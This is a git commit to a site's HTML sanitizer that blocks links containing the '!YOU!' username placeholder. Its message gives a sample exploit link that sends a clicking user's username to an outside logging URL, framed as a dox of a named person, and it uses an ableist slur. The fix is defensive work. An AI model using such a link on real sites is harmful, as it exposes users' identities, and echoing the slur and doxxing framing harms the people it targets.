security: sanitize !YOU! in <a href="">.

Unlike the recent auto-embed exploits which have been patched, this requires active user action. However our userbase, like all userbases, contains quite a few retards and phoneposters who don't check links before clicking. Example exploit: <a href="https://example.com/log?username=!YOU!">Bardfinn Dox</a>
2022-12-05 19:05:02 -05:00 · 2022-12-05 19:05:02 -05:00 · fe5ffd1bcf
parent 616634158c
commit fe5ffd1bcf
1 changed files with 1 additions and 1 deletions
--- a/files/helpers/sanitize.py
+++ b/files/helpers/sanitize.py
@ -61,7 +61,7 @@ def allowed_attributes(tag, name, value):
 		return False

 	if tag == 'a':
-		if name == 'href' and '\\' not in value and 'xn--' not in value:
+		if name == 'href' and '\\' not in value and 'xn--' not in value and '!YOU!' not in value:
 			return True
 		if name == 'rel' and value == 'nofollow noopener': return True
 		if name == 'target' and value == '_blank': return True